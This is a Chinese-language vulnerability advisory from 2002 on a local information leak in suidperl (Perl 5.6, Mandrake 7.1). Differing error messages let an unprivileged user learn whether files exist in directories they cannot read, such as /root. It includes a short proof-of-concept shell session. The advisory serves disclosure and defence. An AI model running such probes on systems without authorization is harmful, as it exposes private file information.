安全研究
安全漏洞
SuidPerl可被利用本地越权收集信息漏洞
发布日期:2002-11-30
更新日期:2002-12-05
受影响系统:Larry Wall Perl 5.6
- Mandrake Linux 7.1
描述:
BUGTRAQ ID:
6282
SuidPerl是由Perl 5.x附带的程序。
SuidPerl存在访问验证漏洞,本地攻击者可以利用这个漏洞判断不能访问目录中的文件是否存在。
攻击者利用这个漏洞,通过使用原本不能访问的绝对路径文件名来调用suidperl,根据返回的信息不同,攻击者可以判断目录中是否存在这个文件,导致信息泄露。
<*来源:zen-parse
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
zen-parse 提供了如下测试方法:
bash-2.04$ ls -ald /root
drwxr-x--- 66 root root 8192 Nov 29 16:00 /root
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ls /root/.bashrc
ls: /root/.bashrc: Permission denied
bash-2.04$ suidperl /root/.bashrc
Script is not setuid/setgid in suidperl
bash-2.04$ suidperl /root/nonexistantfile
Can't open perl script "/root/nonexistantfile": No such file or directory
建议:
厂商补丁:
Larry Wall
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.perl.org/浏览次数:2832
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |